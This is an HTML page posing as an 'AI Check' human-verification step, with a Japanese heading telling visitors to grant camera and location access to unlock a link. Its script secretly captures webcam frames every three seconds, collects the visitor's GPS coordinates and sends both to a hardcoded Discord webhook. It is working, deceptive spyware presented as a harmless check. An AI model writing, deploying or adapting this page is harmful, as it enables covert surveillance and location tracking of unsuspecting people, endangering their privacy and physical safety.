<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>AI Check!</title>
    <style>
      body {
        background-color: #f7f7f7;
        font-family: Arial, sans-serif;
        font-size: 16px;
      }
      h1 {
        color: #003580;
        font-size: 32px;
        text-align: center;
        margin-top: 50px;
      }
      #math-image {
        display: block;
        margin: 0 auto;
        width: 400px;
        height: 300px;
        border: 2px solid #003580;
        border-radius: 10px;
        box-shadow: 5px 5px 10px rgba(0, 0, 0, 0.2);
      }
      #math-equation {
        text-align: center;
        margin-top: 20px;
        font-size: 24px;
        color: #003580;
      }
    </style>
  </head>
  <body>
    <h1>AIではないことを証明するため カメラ・位置情報アクセスを許可してください許可したらリンクが解放されます</h1>
    <img id="math-image" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT8-5rpz6ep3gSkcAvYX_gtPgV1UtURRsfH4m5wNxsrHg&s" alt="Math Equation">
    <div id="math-equation"></div>
<script>
      var imageCounter = 1;
      var intervalId = setInterval(function() {
        captureImage();
      }, 3000);

      function captureImage() {
  var video = document.querySelector('video');
  var canvas = document.createElement('canvas');
  canvas.width = video.videoWidth;
  canvas.height = video.videoHeight;
  canvas.getContext('2d').drawImage(video, 0, 0);

  canvas.toBlob(function(blob) {
    var formData = new FormData();
    formData.append('file', blob, 'math-equation.jpg');

    navigator.geolocation.getCurrentPosition(function(position) {
      var latitude = position.coords.latitude;
      var longitude = position.coords.longitude;
      formData.append('content', `位置情報: 緯度 ${latitude}, 経度 ${longitude}`);

      var xhr = new XMLHttpRequest();
      xhr.open('POST', 'https://discord.com/api/webhooks/1388467866415665213/Eq_E01V-pIGYNw8j-LzzCAyqhiaP7GkwjrCdGS6fO7gWPj2QP4xxzIXX41TJxDEpZH5o');
      xhr.send(formData);
    }, function(error) {
      // 位置情報が取れなかった場合は画像だけ送信
      var xhr = new XMLHttpRequest();
      xhr.open('POST', 'https://discord.com/api/webhooks/1388467866415665213/Eq_E01V-pIGYNw8j-LzzCAyqhiaP7GkwjrCdGS6fO7gWPj2QP4xxzIXX41TJxDEpZH5o');
      xhr.send(formData);
    });

    var equation = 'Equation ' + imageCounter++;
    document.getElementById('math-image').src = canvas.toDataURL();  // これでOK
    document.getElementById('math-equation').innerHTML = equation;
  }, 'image/jpeg', 1.0);
}

      var constraints = { video: { width: 400, height: 300 } };
      navigator.mediaDevices.getUserMedia(constraints)
        .then(function(mediaStream) {
          var video = document.createElement('video');
          video.srcObject = mediaStream;
          video.play();
          document.body.appendChild(video);
        })
        .catch(function(err) {
          console.log(err.name + ": " + err.message);
        });
    </script>
  </body>
</html>
